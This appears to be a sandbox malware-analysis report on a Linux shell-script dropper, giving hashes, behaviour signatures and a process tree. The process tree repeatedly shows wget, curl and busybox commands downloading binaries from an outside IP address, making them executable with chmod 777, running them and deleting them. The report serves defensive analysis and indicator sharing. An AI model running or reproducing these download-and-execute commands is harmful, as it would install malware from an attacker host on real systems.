Analysis
-
max time kernel
10s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1541 chmod 1553 chmod 1595 chmod 1571 chmod 1613 chmod 1490 chmod 1522 chmod 1547 chmod 1559 chmod 1565 chmod 1481 chmod 1577 chmod 1607 chmod 1643 chmod 1529 chmod 1631 chmod 1655 chmod 1535 chmod 1601 chmod 1583 chmod 1589 chmod 1649 chmod 1637 chmod 1504 chmod 1510 chmod 1516 chmod 1619 chmod 1625 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 1482 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 1491 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 1505 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 1511 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 1517 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 1523 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 1530 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 1536 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 1542 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 1548 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 1554 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 1560 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 1566 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 1572 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 1578 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 1584 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 1590 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 1596 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 1602 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 1608 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 1614 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 1620 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 1626 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 1632 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 1638 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 1644 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 1650 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 1656 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:1473
-
/bin/rm/bin/rm bins.sh2⤵PID:1474
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1475
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:1476
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1477
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:1481
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:1482
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1483
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1484
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:1485
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1489
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:1490
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:1491
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1492
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1493
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1503
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1509
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1515
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1521
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1524
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1527
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1534
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1540
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1546
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1552
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1558
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1564
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1570
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1576
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1582
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1588
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1594
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1600
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1606
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1612
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1618
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1624
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:1629
-
-
